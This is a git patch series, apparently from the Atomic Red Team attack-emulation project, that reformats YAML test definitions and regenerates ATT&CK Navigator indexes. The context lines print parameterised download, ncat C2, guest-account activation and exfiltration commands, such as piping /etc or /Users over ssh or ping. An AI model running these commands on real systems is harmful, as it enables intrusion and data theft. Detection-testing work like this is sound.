 supported_platforms: - linux - macos
@@ -65747,13 +65747,13 @@ command-and-control:
 executor: command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
- '
+'
 name: bash - name: sftp remote file copy (pull) auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef' description: 'Utilize sftp to perform a remote file copy (pull)
- '
+'
 supported_platforms: - linux - macos
@@ -65777,14 +65777,14 @@ command-and-control:
 executor: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
- '
+'
 name: bash - name: certutil download (urlcache) auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 description: 'Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
- '
+'
 supported_platforms: - windows input_arguments:
@@ -65799,17 +65799,17 @@ command-and-control:
 executor: command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
- '
+'
 cleanup_command: 'del #{local_path} >nul 2>&1
- '
+'
 name: command_prompt - name: certutil download (verifyctl) auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b description: 'Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
- '
+'
 supported_platforms: - windows input_arguments:
@@ -65831,7 +65831,7 @@ command-and-control:
 cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorAction Ignore
- '
+'
 name: powershell - name: Windows - BITSAdmin BITS Download auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
@@ -65857,7 +65857,7 @@ command-and-control:
 command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
- '
+'
 name: command_prompt - name: Windows - PowerShell Download auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
@@ -65879,17 +65879,17 @@ command-and-control:
 command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
- '
+'
 cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
- '
+'
 name: powershell - name: OSTAP Worming Activity auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad description: 'OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -65966,7 +65966,7 @@ command-and-control:
 auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: 'Download a remote file using the whois utility
- '
+'
 supported_platforms: - linux - macos
@@ -65994,29 +65994,29 @@ command-and-control:
 dependencies: - description: 'The whois and timeout commands must be present
- '
+'
 prereq_command: 'which whois && which timeout
- '
+'
 get_prereq_command: 'echo "Please install timeout and the whois package"
- '
+'
 executor: name: sh elevation_required: false command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
- '
+'
 cleanup_command: 'rm -f #{output_file}
- '
+'
 - name: File Download via PowerShell auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 description: 'Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -66050,7 +66050,7 @@ command-and-control:
 name: command_prompt command: 'finger base64_filedata@#{remote_host}
- '
+'
 T1090.001: technique: external_references:
@@ -66119,7 +66119,7 @@ command-and-control:
 executor: command: 'export #{proxy_scheme}_proxy=#{proxy_server}
- '
+'
 cleanup_command: | unset http_proxy unset https_proxy
@@ -66508,10 +66508,10 @@ command-and-control:
 dependencies: - description: 'ncat.exe must be available at specified location (#{ncat_exe})
- '
+'
 prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
- '
+'
 get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
@@ -66525,7 +66525,7 @@ command-and-control:
 executor: command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}
- '
+'
 name: powershell - name: Powercat C2 auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
@@ -66674,13 +66674,13 @@ command-and-control:
 executor: command: 'Test-NetConnection -ComputerName #{domain} -port #{port}
- '
+'
 name: powershell - name: Testing usage of uncommonly used port auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 description: 'Testing uncommonly used port utilizing telnet.
- '
+'
 supported_platforms: - linux - macos
@@ -66696,7 +66696,7 @@ command-and-control:
 executor: command: 'telnet #{domain} #{port}
- '
+'
 name: sh T1102.003: technique:
@@ -66938,7 +66938,7 @@ command-and-control:
 -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content }
- '
+'
 name: powershell - name: DNS over HTTPS Regular Beaconing auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b
@@ -67128,7 +67128,7 @@ command-and-control:
 and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed.
- '
+'
 supported_platforms: - windows executor:
@@ -67150,7 +67150,7 @@ command-and-control:
 and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed.
- '
+'
 supported_platforms: - windows executor:
@@ -67169,7 +67169,7 @@ command-and-control: and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -67189,7 +67189,7 @@ command-and-control: and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed. - ' +' supported_platforms: - windows executor: @@ -67258,7 +67258,7 @@ command-and-control: auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 description: 'Utilizing a common technique for posting base64 encoded data. - ' +' supported_platforms: - macos - linux @@ -67564,7 +67564,7 @@ command-and-control: - description: "Curl must be installed on system \n" prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl @@ -67769,7 +67769,7 @@ exfiltration: auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a description: 'Take a file/directory, split it into 5Mb chunks - ' +' supported_platforms: - macos - linux @@ -67788,12 +67788,12 @@ exfiltration: prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name} bs=25000000 count=1 - ' +' executor: command: | cd #{folder_path}; split -b 5000000 #{file_name} @@ -67801,7 +67801,7 @@ exfiltration: cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; - ' +' name: sh T1048: technique: 
@@ -67880,7 +67880,7 @@ exfiltration: executor: command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz - ' +' name: sh - name: Exfiltration Over Alternative Protocol - SSH auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 @@ -67910,7 +67910,7 @@ exfiltration: command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} ''cat > /Users.tar.gz.enc'' - ' +' name: sh T1048.002: technique: @@ -68282,13 +68282,13 @@ exfiltration: in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } - ' +' name: powershell - name: Exfiltration Over Alternative Protocol - DNS auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 description: 'Exfiltration of specified file over DNS protocol. - ' +' supported_platforms: - linux executor: @@ -68333,7 +68333,7 @@ exfiltration: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell input_arguments: input_file: @@ -68946,16 +68946,16 @@ initial-access: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows executor: command: 'net user guest /active:yes - ' +' cleanup_command: 'net user guest /active:no - ' +' name: command_prompt elevation_required: true T1078.002: @@ -69269,7 +69269,7 @@ initial-access: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: 
@@ -69282,12 +69282,12 @@ initial-access: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -69651,7 +69651,7 @@ initial-access: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product: @@ -69662,7 +69662,7 @@ initial-access: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -69673,7 +69673,7 @@ initial-access: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -69682,7 +69682,7 @@ initial-access: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell T1566.002: technique: From a910184ca67cd8e9948dd21ebaac45643afc18f8 Mon Sep 17 00:00:00 2001 From: Araveti Esanya Reddy <88440780+esanyaCode@users.noreply.github.com> Date: Tue, 17 Aug 2021 10:22:01 +0530 Subject: [PATCH 19/39] Update T1562.008.yaml --- atomics/T1562.008/T1562.008.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index c6689e43..2b76c7a9 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml 
@@ -26,7 +26,7 @@ atomic_tests:
 prereq_command: |
 cat ~/.aws/credentials | grep "default"
 aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
- aws s3api put-bucket-policy --bucket redatomic-test --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
+ aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
 get_prereq_command: |
 echo Please install the aws-cli and configure your AWS defult profile using: aws configure
 executor:
From 6f08a3100269b5ba73fee87ae67f09bb72dc550b Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator
Date: Wed, 18 Aug 2021 20:14:35 +0000
Subject: [PATCH 20/39] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/used_guids.txt | 1 +
 1 file changed, 1 insertion(+)
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index aa96fbf8..4051f6a4 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -762,3 +762,4 @@ c4ae0701-88d3-4cd8-8bce-4801ed9f97e4
 eeb9751a-d598-42d3-b11c-c122d9c3f6c7
 9d77fed7-05f8-476e-a81b-8ff0472c64d0
 aa6cb8c4-b582-4f8e-b677-37733914abda
+9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
From 2795e1312d8a6495d41f9b9a06711487e6f10faa Mon Sep 17 00:00:00 2001
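Review bot: The corrected `put-bucket-policy` line now targets the same `#{s3_bucket_name}` that `create-bucket` provisions, but the prereq block it sits in still does not gate on its own checks: `cat ~/.aws/credentials | grep "default"` echoes the matched credential-file line to the runner's output and, since the block presumably reports only the last command's status, neither a missing profile nor a failed `create-bucket` (for example a bucket left over from an earlier run) stops a succeeding `put-bucket-policy` from marking the prerequisite as met. Replacing the first line with `grep -q "default" ~/.aws/credentials || exit 1` and appending `|| exit 1` to the `create-bucket` line would make each step an actual gate and keep the policy from being applied to a bucket this test did not create. The atomic test's definition and its `input_arguments` (where `s3_bucket_name` and `region` are declared) start outside the hunk.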
From: CircleCI Atomic Red Team doc generator
Date: Wed, 18 Aug 2021 20:14:40 +0000
Subject: [PATCH 21/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 .../art-navigator-layer-iaas.json | 2 +-
 .../art-navigator-layer-linux.json | 2 +-
 .../art-navigator-layer.json | 2 +-
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/linux-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 3 +-
 .../Indexes/Indexes-Markdown/linux-index.md | 3 +-
 atomics/Indexes/Matrices/linux-matrix.md | 2 +-
 atomics/Indexes/Matrices/matrix.md | 2 +-
 atomics/Indexes/index.yaml | 45 ++++++++++++-
 atomics/T1562.008/T1562.008.md | 67 +++++++++++++++++++
 11 files changed, 122 insertions(+), 8 deletions(-)
 create mode 100644 atomics/T1562.008/T1562.008.md
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
index 9964aaea..b6136576 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index c29f8eb0..09d2ec05 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"technique
ID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled"
:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":tr
ue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https
://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"te